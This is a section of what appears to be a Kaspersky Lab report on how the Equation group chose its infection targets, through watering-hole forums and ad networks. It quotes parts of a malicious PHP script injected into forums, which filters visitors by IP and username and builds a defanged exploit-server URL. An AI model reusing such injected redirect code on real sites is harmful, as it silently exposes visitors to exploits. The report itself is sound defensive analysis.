15. How do victims get selected for infection
The EQUATION group sometimes selects its victims with surgical precision.
When precision is not possible, the victims are targeted by a validator
(DOUBLEFANTASY) implant and subsequently disinfected if they do not appear to
be interesting to the attackers.
Here are some web-based targeting examples from the Equation group:
On March 2, 2013, a Kaspersky Lab user browsing an online forum was attacked
with an exploit from one of the Equation groups exploitation servers:
2013-03-02
technicalconsumerreports[.]com/modular/assemble.php?params=YoGKKdExT[snip]
cS5kS5t0bvGQyB8miDu+Agn detected HEUR:Exploit.Script.Generic
The attack was unsuccessful as it was caught by our product and the user was
protected. The attack was targeting Firefox 17 (TOR Browser), using an unknown
exploit that we have not recovered.
Looking further, we identified a few other known Equation servers used in similar
attacks even earlier:
2012-12-11
technology-revealed[.]com/diagram/navigate.html?overlay=AL[snip]OISn6sI1&sn=d1[SNIP]dd
These attacks were delivered in several ways for example, while the user
visited a number of Islamic Jihadist discussion forums, or via advertisements on
popular websites in the Middle East.
The forums in question appear to have been compromised by a specific PHP
script that exploited only authenticated visitors. We were able to obtain one of
these PHP scripts embedded in a discussion forum:
Malicious PHP script injected into hacked discussion forums
This PHP script provides a multitude of interesting information about the attacks.
It was first designed to work as part of vBulletin, a commercial forum platform. It
specifically checks if the visitors username MD5 matches two values:
84b8026b3f5e6dcfb29e82e0b0b0f386 MD5 of Unregistered
e6d290a03b70cfa5d4451da444bdea39 unknown MD5
In practice, this means that only logged-in users will be exploited. Next, the PHP
exploitation script checks if the user comes from a specific address range:
if(preg_match('/^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|7
9.173.|85.159.|94.249.|86.108.)/',IPADDRESS)){return "";}
Converting the ranges to their respective countries (except for 64.38.3.50, which
is the only specific IP mentioned) we get the following TOP 3 countries that will
NOT be exploited:
1. Jordan
2. Turkey
3. Egypt
This means that the attackers have taken special care not to infect users visiting
from certain ISPs in these countries. If the visitors are from any other IP range,
the PHP script constructs an exploitation URL which includes the logged in
vBulletin forum name:
$htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRu
QQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDH
z4vKecDGe7OzDmJlvwKvc5uYg/I/5x9";
$htt=$htt."&sn=".bin2hex(substr($u,0,14));
The vBulletin forum username is stored in hex, as the sn= parameter to the
exploit site. The exploit site can choose to hit the visitor with an exploit depending
on the username, meaning that the attackers are taking great care to infect only
very specific targets on these forums.
Interestingly, the PHP script produces a different HTML page for iPhone visitors:
if (preg_match('/iPhone/',$_SERVER['HTTP_USER_AGENT'])){$scroll='yes';}
This indicates that the exploit server is probably aware of iPhone visitors and can
deliver exploits for them as well; otherwise, the exploitation URL can simply be
removed for these visitors.
Most recently, the attackers used Java exploits, delivered through a specific
server to visitors from the Middle East via advertising networks on popular
websites. Heres an example:
standardsandpraiserepurpose[.]com/login?qq=5eaae4d[SNIP]0563&rr=1&h=cc593a6bfd8e1e
26c2734173f0ef75be3527a205
These 2013-2014 attacks make use of a new domain,
standardsandpraiserepurpose[.]com. Interesting to point out the similarity
in the URL construction, with parameters rr=1, followed by h= a value
resembling a SHA1 hash, possibly the specific targeted username. Other
collected h= values include the following:
0044c9bfeaac9a51e77b921e3295dcd91ce3956a
06cf1af1d018cf4b0b3e6cfffca3fbb8c4cd362e
3ef06b6fac44a2a3cbf4b8a557495f36c72c4aa6
5b1efb3dbf50e0460bc3d2ea74ed2bebf768f4f7
930d7ed2bdce9b513ebecd3a38041b709f5c2990
e9537a36a035b08121539fd5d5dcda9fb6336423
Considering the length and format, one might suspect they are a SHA1 hash,
however, unlike the forum MD5 hashes, we couldnt break any of them.
The exploits from standardsandpraiserepurpose[.]com targeted several
Kaspersky Lab users and were all unsuccessful. The server attempts three
different Java exploits, containing the same payload stored as info.dat inside
the Java archive. These are simple downloaders that contain shellcode to
download and execute the next stage from the C&C:
Unfortunately, we werent able to download a copy of the next stage as the
URL was already dead at the time of checking, or else it is only served and
built specifically for victims at specific IPs. Another unusual aspect of targeting
included multiple infection attempts against users of a certain satellite internet
provider in Afghanistan.
